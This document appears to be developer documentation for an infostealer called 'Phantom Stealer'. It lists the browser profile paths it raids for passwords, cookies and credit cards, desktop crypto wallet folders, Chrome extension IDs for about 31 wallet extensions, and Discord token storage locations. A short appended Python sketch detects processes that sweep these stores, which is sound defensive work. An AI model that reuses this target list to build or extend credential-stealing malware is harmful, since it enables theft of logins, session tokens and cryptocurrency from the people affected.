Overview
Phantom Stealer targets a wide range of browsers, cryptocurrency wallets, and messaging applications. All target definitions are located in config/config.go.
Paths are relative to the user’s home directory. The stealer automatically resolves paths like AppData\Roaming and AppData\Local.
Browser Targets
The BrowserPaths map defines all supported browsers with their configuration paths.
Chromium-Based Browsers
Google Chrome
{
    Path:    "AppData\\Local\\Google\\Chrome\\User Data",
    Profile: "Default",
    Type:    "chromium",
}
Extracts passwords, cookies, credit cards, and history from Chrome’s default profile.
Microsoft Edge
{
    Path:    "AppData\\Local\\Microsoft\\Edge\\User Data",
    Profile: "Default",
    Type:    "chromium",
}
Brave Browser
{
    Path:    "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
    Profile: "Default",
    Type:    "chromium",
}
Opera Stable
{
    Path:    "AppData\\Roaming\\Opera Software\\Opera Stable",
    Profile: "",
    Type:    "chromium",
}
Opera doesn’t use a profile subfolder, hence the empty Profile field.
Opera GX (gaming-focused Opera variant)
{
    Path:    "AppData\\Roaming\\Opera Software\\Opera GX Stable",
    Profile: "",
    Type:    "chromium",
}
Vivaldi Browser
{
    Path:    "AppData\\Local\\Vivaldi\\User Data",
    Profile: "Default",
    Type:    "chromium",
}
Yandex Browser
{
    Path:    "AppData\\Local\\Yandex\\YandexBrowser\\User Data",
    Profile: "Default",
    Type:    "chromium",
}
Chromium (open-source base)
{
    Path:    "AppData\\Local\\Chromium\\User Data",
    Profile: "Default",
    Type:    "chromium",
}
Firefox-Based Browsers
Firefox browsers use different encryption than Chromium browsers and require special handling.
Mozilla Firefox
{
    Path:    "AppData\\Roaming\\Mozilla\\Firefox\\Profiles",
    Profile: "",
    Type:    "firefox",
}
Uses its own encryption scheme separate from Windows DPAPI.
Waterfox
{
    Path:    "AppData\\Roaming\\Waterfox\\Profiles",
    Profile: "",
    Type:    "firefox",
}
BrowserConfig Structure
type BrowserConfig struct {
    Path    string // Base path to browser data
    Profile string // Profile subfolder (empty if not used)
    Type    string // "chromium" or "firefox"
}
Desktop Wallet Targets
The WalletTargets map defines paths to desktop cryptocurrency wallet applications.
Popular Wallets
Exodus Wallet - Multi-currency desktop wallet with built-in exchange.
WalletTargets["Electrum"]
string
default: "\"AppData\\\\Roaming\\\\Electrum\\\\wallets\""
Electrum - Popular Bitcoin wallet.
Atomic Wallet - Multi-currency wallet with staking support.
Jaxx Liberty - Deprecated but still widely used multi-currency wallet.
Coinomi - Multi-currency wallet with strong privacy features.
Guarda Wallet - Multi-platform cryptocurrency wallet.
Core Wallets
Official wallets for major cryptocurrencies. These typically store funds in wallet.dat files.
WalletTargets["BitcoinCore"]
string
default: "\"AppData\\\\Roaming\\\\Bitcoin\\\\wallets\""
Bitcoin Core - Official Bitcoin wallet implementation.
WalletTargets["LitecoinCore"]
string
default: "\"AppData\\\\Roaming\\\\Litecoin\\\\wallets\""
Litecoin Core - Official Litecoin wallet.
WalletTargets["DashCore"]
string
default: "\"AppData\\\\Roaming\\\\DashCore\\\\wallets\""
Dash Core - Official Dash wallet.
Privacy-Focused Wallets
WalletTargets["Monero"]
string
default: "\"Documents\\\\Monero\\\\wallets\""
Monero Wallet - Privacy cryptocurrency wallet. Monero uses an unusual path in the Documents folder instead of AppData.
WalletTargets["ZCash"]
string
default: "\"AppData\\\\Roaming\\\\Zcash\""
ZCash Wallet - Privacy-focused cryptocurrency wallet.
Wasabi Wallet - Bitcoin wallet with built-in CoinJoin mixing for enhanced privacy.
Browser Extension Wallets
The ExtensionTargets map contains Chrome extension IDs for cryptocurrency wallet extensions. These IDs are universal across Chromium-based browsers (Chrome, Edge, Brave, Opera, etc.).
Major Extensions
ExtensionTargets["Metamask"]
string
default: "\"nkbihfbeogaeaoehlefnkodbefgpgknn\""
MetaMask - Most popular Ethereum and EVM-compatible wallet extension.
ExtensionTargets["TronLink"]
string
default: "\"ibnejdfjmmkpcnlpebklmnkoeoihofec\""
TronLink - Official Tron network wallet.
ExtensionTargets["BinanceChain"]
string
default: "\"fhbohimaelbohpjbbldcngcnapndodjp\""
Binance Chain Wallet - BNB and BSC wallet extension.
ExtensionTargets["Coin98"]
string
default: "\"aeachknmefphepccionboohckonoeemg\""
Coin98 Wallet - Multi-chain DeFi wallet.
ExtensionTargets["Phantom"]
string
default: "\"bfnaelmomeimhlpmgjnjophhpkkoljpa\""
Phantom - Popular Solana wallet extension.
Additional Extensions
Cosmos & Multi-Chain Wallets
ExtensionTargets["Keplr"]
string
default: "\"dmkamcknogkgcdfhhbddcghachkejeap\""
Keplr - Cosmos ecosystem wallet.
ExtensionTargets["Terra"]
string
default: "\"aiifbnbfobpmeekipheeijimdpnlpgpp\""
Terra Station - Terra blockchain wallet.
ExtensionTargets["XDEFI"]
string
default: "\"hmeobnfnfcmdkdcmlblgagmfpfboieaf\""
XDEFI Wallet - Multi-chain DeFi wallet.
ExtensionTargets["Sollet"]
string
default: "\"fhmfendgdocmcbmfikdcogofphimnkno\""
Sollet - Solana wallet extension.
ExtensionTargets["Slope"]
string
default: "\"pocmplpaccanhmnllbbkpgfliimjljgo\""
Slope - Solana wallet with mobile sync.
ExtensionTargets["Ronin"]
string
default: "\"fnjhmkhhmkbjkkabndcnnogagogbneec\""
Ronin Wallet - Axie Infinity and gaming-focused wallet.
ExtensionTargets["Wombat"]
string
default: "\"amkmjjmmflddogmhpjloimipbofnfjih\""
Wombat - Gaming and NFT wallet.
ExtensionTargets["GuildWallet"]
string
default: "\"nanjmdknhkinifnkgdcggcfnhdaammmj\""
Guild Wallet - Gaming guild treasury wallet.
ExtensionTargets["BraveWallet"]
string
default: "\"odbfpeeihdkbihmopkbjmoonfanlbfcl\""
Brave Wallet - Built-in Brave browser wallet.
ExtensionTargets["Coinbase"]
string
default: "\"hnfanknocfeofbddgcijnmhnfnkdnaad\""
Coinbase Wallet - Self-custody wallet from Coinbase.
ExtensionTargets["Trust"]
string
default: "\"egjidjbpglichdcondbcbdnbeeppgdph\""
Trust Wallet - Multi-currency mobile and extension wallet.
ExtensionTargets["MEWcx"]
string
default: "\"nlbmnnijcnlegkjjpcfjclmcfggfefdm\""
MEW CX - MyEtherWallet Chrome extension.
ExtensionTargets["OneKey"]
string
default: "\"infeboajgfhgbjpjbeppbkgnabfdkdaf\""
OneKey - Open-source hardware wallet companion.
ExtensionTargets["BitKeep"]
string
default: "\"jiidiaalihmmhddjgbnbgdfflelocpak\""
BitKeep - Multi-chain DeFi wallet.
ExtensionTargets["Math"]
string
default: "\"afbcbjpbpfadlkmhmclhkeeodmamcflc\""
Math Wallet - Multi-platform crypto wallet.
ExtensionTargets["Hashpack"]
string
default: "\"gjagmgiddbbciopjhllkdnddhcglnemk\""
HashPack - Hedera (HBAR) wallet.
ExtensionTargets["TON"]
string
default: "\"nphplpgoakhhjchkkhmiggakijnkhfnd\""
TON Wallet - The Open Network wallet.
ExtensionTargets["Starcoin"]
string
default: "\"mfhbebgoclkghebffdldpobeajmbecfk\""
Starcoin - Starcoin blockchain wallet.
ExtensionTargets["Swash"]
string
default: "\"cmndjbecilbocjfkibfbifhngkdmjgog\""
Swash - Data monetization wallet.
ExtensionTargets["Finnie"]
string
default: "\"cjmkndjhnagcfbpiemnkdpomccnjblmj\""
Finnie - Koii network wallet.
ExtensionTargets["iWallet"]
string
default: "\"kncchdigobghenbbaddojjnnaogfppfj\""
iWallet - Multi-chain wallet.
ExtensionTargets["Oxygen"]
string
default: "\"fhilaheimglignddkjgofkcbgekhenbh\""
Oxygen - DeFi wallet.
ExtensionTargets["NeoLine"]
string
default: "\"cphhlgmgameodnhkjdmkpanlelnlohao\""
NeoLine - NEO blockchain wallet.
ExtensionTargets["KHC"]
string
default: "\"hcflpincpppdclinealmandijcmnkbgn\""
KHC - KuCoin Community Chain wallet.
ExtensionTargets["GeroWallet"]
string
default: "\"bgpipimickeadkjlklgciifhnalhdjhe\""
Gero Wallet - Cardano wallet.
ExtensionTargets["Clover"]
string
default: "\"nhnkbkgjikgcigadomkphalanndcapjk\""
Clover - Multi-chain wallet.
ExtensionTargets["Halo"]
string
default: "\"ocdciohofkgohmibehfoijjbkfgobpob\""
Halo - Klay (Klaytn) wallet.
Discord Token Paths
The DiscordPaths array contains all locations where Discord authentication tokens might be stored.
Desktop Client Paths
// Discord Desktop Clients
"AppData\\Roaming\\discord\\Local Storage\\leveldb"
"AppData\\Roaming\\discordcanary\\Local Storage\\leveldb"
"AppData\\Roaming\\discordptb\\Local Storage\\leveldb"
"AppData\\Local\\Discord\\Local Storage\\leveldb"
"AppData\\Local\\DiscordCanary\\Local Storage\\leveldb"
"AppData\\Local\\DiscordPTB\\Local Storage\\leveldb"
Discord has three release channels: Stable, Canary (beta), and PTB (Public Test Build). Each stores tokens separately.
Browser Session Paths
For users who access Discord through web browsers instead of the desktop app:
// Opera Browsers
"AppData\\Roaming\\Opera Software\\Opera Stable\\Local Storage\\leveldb"
"AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb"
// Google Chrome
"AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb"
// Brave Browser
"AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb"
// Yandex Browser
"AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb"
// Microsoft Edge
"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb"
All these paths must be checked since users may have Discord tokens in multiple locations if they use both desktop and web versions.
Complete Target Summary
Browsers: 10 different browsers (8 Chromium-based, 2 Firefox-based)
Desktop Wallets: 12 applications
Extension Wallets: 31 browser extensions
Discord Paths: 12 locations (6 desktop + 6 browser)
Total Targets: 65+ applications and services
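
Detection note (an added example, not code from the project this page documents): the breadth of the target list is itself a usable signal, because a legitimate application reads its own data directory while a stealer reads many unrelated ones. The sketch below flags any process that touches several watched stores it does not own; the event tuples, the owner image names and the threshold are assumptions made for the example.

```python
from collections import defaultdict

# Lower-cased path fragments from this page's target lists (subset).
# Owner image names are assumptions for the example; tune per environment.
WATCHED = {
    r"appdata\local\google\chrome\user data": ("Chrome", "chrome.exe"),
    r"appdata\local\microsoft\edge\user data": ("Edge", "msedge.exe"),
    r"appdata\roaming\mozilla\firefox\profiles": ("Firefox", "firefox.exe"),
    r"appdata\roaming\electrum\wallets": ("Electrum", "electrum.exe"),
    r"appdata\roaming\bitcoin\wallets": ("BitcoinCore", "bitcoin-qt.exe"),
    r"appdata\roaming\discord\local storage\leveldb": ("Discord", "discord.exe"),
}

def classify(path):
    """Map a file path to (product, owner image) or None if not watched."""
    p = path.lower()
    for fragment, info in WATCHED.items():
        if fragment in p:
            return info
    return None

def find_sweepers(events, threshold=3):
    """Return {image: [products]} for processes that touched at least
    `threshold` distinct watched products they do not own."""
    touched = defaultdict(set)
    for image, path in events:
        hit = classify(path)
        if hit is None:
            continue
        product, owner = hit
        if image.lower().rsplit("\\", 1)[-1] != owner:
            touched[image].add(product)
    return {i: sorted(p) for i, p in touched.items() if len(p) >= threshold}

# Constructed file-access events: (process image, file path).
HOME = r"C:\Users\alice"
UNKNOWN = HOME + r"\Downloads\sample.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EVENTS = [
    (CHROME, HOME + r"\AppData\Local\Google\Chrome\User Data\Default\a.db"),
    (UNKNOWN, HOME + r"\AppData\Local\Google\Chrome\User Data\Default\a.db"),
    (UNKNOWN, HOME + r"\AppData\Local\Microsoft\Edge\User Data\Default\a.db"),
    (UNKNOWN, HOME + r"\AppData\Roaming\Electrum\wallets\w1"),
    (UNKNOWN, HOME + r"\AppData\Roaming\discord\Local Storage\leveldb\1.ldb"),
    (r"C:\Tools\backup.exe", HOME + r"\AppData\Roaming\Bitcoin\wallets\w1"),
]

if __name__ == "__main__":
    for image, products in find_sweepers(EVENTS).items():
        print(f"ALERT {image} read stores of: {', '.join(products)}")
```

In practice the events would come from file-access telemetry such as EDR or object-access auditing, and backup or sync agents would need an allowlist.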